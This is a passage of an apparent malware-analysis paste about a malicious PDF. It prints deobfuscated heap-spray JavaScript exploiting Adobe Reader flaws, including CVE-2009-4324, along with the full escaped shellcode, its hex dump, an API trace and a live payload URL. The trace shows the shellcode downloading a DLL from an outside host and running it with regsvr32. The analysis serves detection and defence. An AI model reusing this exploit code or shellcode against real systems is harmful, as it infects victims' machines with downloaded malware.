  437.    var dkg = new Array();
  438.    var vw = 0x0c0c0c0c;
  439.    var addr = 0x400000;
  440.    var payload = unescape(bjsg);
  441.    var sc_len = payload.length * 2;
  442.    var qy = addr - (sc_len + 0x38);
  443.    var yarsp = unescape("%u9090%u9090");
  444.    yarsp = ezvr(yarsp, qy);
  445.    var count2 = (vw - 0x400000) / addr;
  446.    for (var count = 0; count < count2; count ++ )
  447.    {
  448.      dkg[count] = yarsp + payload
  449.    }
  450.    var overflow = unescape("%u0c0c%u0c0c");
  451.    while (overflow.length < 44952)
  452.    {
  453.      overflow += overflow
  454.    }
  455.    this .collabStore = Collab.collectEmailInfo(
  456.    {
  457.      subj : "", msg : overflow
  458.    }
  459.    )
  460.  }
  461.  
  462.  
  463. // As for the Adobe version below:
  464. // ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
  465. // To be aplied Exploit CVE-2009-4324
  466. // Vuln Name: Doc.media.newPlayer vulnerability in Adobe Reader/Acrobat v8.0 through 9.2
  467.  
  468.    function a()
  469.    {
  470.      util.printd('p@111111111111111111111111 : yyyy111', new Date())
  471.    }
  472.    var h = app.plugIns;
  473.    for (var f = 0; f < h.length; f ++ )
  474.    {
  475.      if (h[f].name == 'EScript')
  476.      {
  477.        var i = h[f].version
  478.      }
  479.    }
  480.    if ((i > 8.12) && (i < 8.2))
  481.    {
  482.      c = new Array();
  483.      var d = unescape('%u9090%u9090');
  484.      var e = unescape(bjsg);
  485.      while (d.length <= 0x8000)
  486.      {
  487.        d += d
  488.      }
  489.      d = d.substr(0, 0x8000 - e.length);
  490.      for (f = 0; f < 2900; f ++ )
  491.      {
  492.        c[f] = d + e
  493.      }
  494.      a();
  495.      a();
  496.      try
  497.      {
  498.        this .media.newPlayer(null)
  499.      }
  500.      catch (e)
  501.      {
  502.      }
  503.      a()
  504.    }
  505.  }
  506.  
  507.  
  508. =======================================
  509.  
  510. SHELLCODE EXECUTION POST EXPLOITATION
  511.  
  512. ======================================
  513.  
  514.  
  515. // After successful Exploited the Adobe,
  516. // It executed the shellcode as per coded
  517.  
  518.  bjsg = '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';
  519.  
  520.  
  521. //↑if we unescape it, it will burps the binary below:
  522.  
  523.  
  524. 66 83 e4 fc fc 85 e4 75  34 e9 5f 33 c0 64 8b 40   f......u4._3.d.@
  525. 30 8b 40 0c 8b 70 1c 56  8b 76 08 33 db 66 8b 5e   0.@..p.V.v.3.f.^
  526. 3c 03 74 33 2c 81 ee 15  10 ff ff b8 8b 40 30 c3   <.t3,........@0.
  527. 46 39 06 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
  528. 56 8b 75 3c 8b 74 35 78  03 f5 56 8b 76 20 03 f5   V.u<.t5x..V.v...
  529. 33 c9 49 41 fc ad 03 c5  33 db 0f be 10 38 f2 74   3.IA....3....8.t
  530. 08 c1 cb 0d 03 da 40 eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
  531. 24 03 dd 66 8b 0c 4b 8d  46 ec ff 54 24 0c 8b d8   $..f..K.F..T$...
  532. 03 dd 8b 04 8b 03 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
  533. 20 80 7d 0c 33 74 03 96  eb f3 8b 68 08 8b f7 6a   ..}.3t.....h...j
  534. 05 59 e8 98 ff ff ff e2  f9 e8 00 00 00 00 58 50   .Y............XP
  535. 6a 40 68 ff 00 00 00 50  83 c0 19 50 55 8b ec 8b   j@h....P...PU...
  536. 5e 10 83 c3 05 ff e3 68  6f 6e 00 00 68 75 72 6c   ^......hon..hurl
  537. 6d 54 ff 16 83 c4 08 8b  e8 e8 61 ff ff ff eb 02   mT........a.....
  538. eb 72 81 ec 04 01 00 00  8d 5c 24 0c c7 04 24 72   .r.......\$...$r
  539. 65 67 73 c7 44 24 04 76  72 33 32 c7 44 24 08 20   egs.D$.vr32.D$..
  540. 2d 73 20 53 68 f8 00 00  00 ff 56 0c 8b e8 33 c9   -s.Sh.....V...3.
  541. 51 c7 44 1d 00 77 70 62  74 c7 44 1d 05 2e 64 6c   Q.D..wpbt.D...dl
  542. 6c c6 44 1d 09 00 59 8a  c1 04 30 88 44 1d 04 41   l.D...Y...0.D..A
  543. 51 6a 00 6a 00 53 57 6a  00 ff 56 14 85 c0 75 16   Qj.j.SWj..V...u.
  544. 6a 00 53 ff 56 04 6a 00  83 eb 0c 53 ff 56 04 83   j.S.V.j....S.V..
  545. c3 0c eb 02 eb 13 47 80  3f 00 75 fa 47 80 3f 00   ......G.?.u.G.?.
  546. 75 c4 6a 00 6a fe ff 56  08 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
  547. 0e ec 98 fe 8a 0e 89 6f  01 bd 33 ca 8a 5b 1b c6   .......o..3..[..
  548. 46 79 36 1a 2f 70 68 74  74 70 3a 2f 2f 64 65 6c   Fy6./phttp://del
  549. 65 6d 69 61 74 6f 72 2e  72 75 3a 38 30 38 30 2f   emiator.ru:8080/
  550. 66 6f 72 75 6d 2f 6c 69  6e 6b 73 2f 63 6f 6c 75   forum/links/colu
  551. 6d 6e 2e 70 68 70 3f 63  79 6d 77 75 3d 33 30 3a   mn.php?cymwu=30:
  552. 31 6e 3a 31 69 3a 31 69  3a 33 33 26 74 69 6b 70   1n:1i:1i:33&tikp
  553. 69 79 6b 66 3d 32 76 3a  31 6b 3a 31 6d 3a 33 32   iykf=2v:1k:1m:32
  554. 3a 33 33 3a 31 6b 3a 31  6b 3a 33 31 3a 31 6a 3a   :33:1k:1k:31:1j:
  555. 31 6f 26 7a 6b 6f 75 3d  31 68 26 68 79 65 64 6f   1o&zkou=1h&hyedo
  556. 61 3d 66 70 74 6d 6c 26  68 69 63 64 6b 3d 68 6d   a=fptml&hicdk=hm
  557. 79 6e 6b 61 6a 77 00 00                            ynkajw..          
  558.  
  559.  
  560. // The API Of the shellcode is as per below:
  561. // Usage of OS component library as kernel32.dll , urlmon.DLL, and regsvr32.exe is used to make an infection
  562.  
  563. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
  564. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  565. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  566. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?cymwu=30:1n:1i:1i:33&tikpiykf=2v:1k:1m:32:33:1k:1k:31:1j:1o&zkou=1h&hyedoa=fptml&hicdk=hmynkajw, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  567. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  568. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)       
  569. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  570.  
  571. ===============================
  572. PAYLOAD URL IS HERE....
  573. ==============================
  574.  
  575. // There we go the URL is plainly seen now;
  576.  
  577. http://delemiator.ru:8080/forum/links/column.php?cymwu=30:1n:1i:1i:33&tikpiykf=2v:1k:1m:32:33:1k:1k:31:1j:1o&zkou=1h&hyedoa=fptml&hicdk=hmynkajw
  578.  
  579.  
  580. ================================================
  581.  
  582. CURRENT DETECTION OF ANTIVIRUS IS ??
  583.  
  584. ================================================
  585.  
  586. //It has a "not bad detection" VT Score is (19 / 44)
  587. // url: https://www.virustotal.com/file/b771f74ff9c17682f15485bc11a7dd379cfea3b8b1f48b1391a5e53b7e693c2c/analysis/
  588. //
  589. // But you'll now know for sure of what exploitation used if you
  590. // got hit by this mess, because AV products result shows
  591. // the below "not so comprehensive" malware names.. of it.
  592. // None of it exploit which exploit number which actually exist in this malicious PDF infector..
  593.  
  594. F-Secure                 : Exploit:W32/Kakara.A
  595. DrWeb                    : Exploit.PDF.3099
  596. Microsoft                : Exploit:Win32/Pdfjsc.AEW
  597. AntiVir                  : EXP/Pidief.dmj
  598. Norman                   : JS/Pdfka.BM
  599. McAfee-GW-Edition        : Heuristic.BehavesLike.PDF.Exploit-CRT.I
  600. MicroWorld-eScan         : PDF:Exploit.PDF-JS.IG
  601. Avast                    : JS:Pdfka-gen [Expl]
  602. nProtect                 : PDF:Exploit.PDF-JS.IG
  603. GData                    : PDF:Exploit.PDF-JS.IG
  604. Kaspersky                : HEUR:Exploit.Script.Generic
  605. BitDefender              : PDF:Exploit.PDF-JS.IG
  606. McAfee                   : Exploit-PDF!Blacole.q
  607. ESET-NOD32               : JS/Exploit.Pdfka.PVR
  608. Ikarus                   : Exploit.PDF
  609. AVG                      : Script/PDF.Exploit
  610. Sophos                   : Troj/PdfEx-HM
  611. TrendMicro               : HEUR_PDFEXP.B
  612. Comodo                   : Exploit.JS.Pdfka.at
  613.  
  614. // end
  615.  
  616. // .. We swore,
  617. // .. the sweat, tears & blood  of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
  618. // .. bless & glory to those who stick to fight for the truth 'till the end..
  619. // .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
  620. // .. with curse that shall last foverer, a curse for those enemies of God..
  621. // ..
  622. // .. Yet,is not too late to stop your evil works. Ask for forgiveness and stop your act.
  623. // ..
  624. ---
  625. #MalwareMustDie
  626. @unixfreaxjp ~]$ date
  627. Mon Nov 26 16:35:46 JST 2012
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top